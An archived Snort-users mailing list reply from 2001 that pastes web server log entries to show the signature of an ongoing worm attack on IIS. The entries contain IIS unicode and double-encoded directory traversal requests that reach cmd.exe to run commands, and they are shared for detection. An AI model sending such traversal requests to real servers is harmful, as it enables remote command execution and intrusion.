Snort mailing list archives
Re: WEB-IIS Cmd attack
From: Erek Adams <erek () theadamsfamily net>
Date: Tue, 18 Sep 2001 09:09:24 -0700 (PDT)
On Tue, 18 Sep 2001, cdowns wrote:
What is the actual signiture as i have seen nothing yet on my servers in NH
Give it time, give it time.... What I'm seeing is the following: xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /c/winnt/system32/cmd.exe? /c+dir HTTP/1.0" 404 297 "-" "-" xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /d/winnt/system32/cmd.exe? /c+dir HTTP/1.0" 404 297 "-" "-" xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /scripts/..%255c../winnt /system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-" xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_vti_bin/..%255c.. /..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-" xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_mem_bin/..%255c.. /..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-" xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /msadc/..%255c../..%255c.. /..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-" xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:37 -0700] "GET /scripts/..%c1%1c../winnt /system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-" And repeats, ad nausem. There are some others, but basically still just your standard unicode string attack. Damn... This one looks worse than CR. *sigh* ----- Erek Adams Nifty-Type-Guy TheAdamsFamily.Net _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- WEB-IIS Cmd attack Togan Muftuoglu (Sep 18)
- Re: WEB-IIS Cmd attack R P G (Sep 18)
- Re: WEB-IIS Cmd attack cdowns (Sep 18)
- Re: WEB-IIS Cmd attack Togan Muftuoglu (Sep 18)
- Re: WEB-IIS Cmd attack Erek Adams (Sep 18)
- Re: WEB-IIS Cmd attack cdowns (Sep 18)
- Re: WEB-IIS Cmd attack John Sage (Sep 18)
- <Possible follow-ups>
- Re: WEB-IIS Cmd attack Dr SuSE (Sep 18)
- Re: WEB-IIS Cmd attack R P G (Sep 18)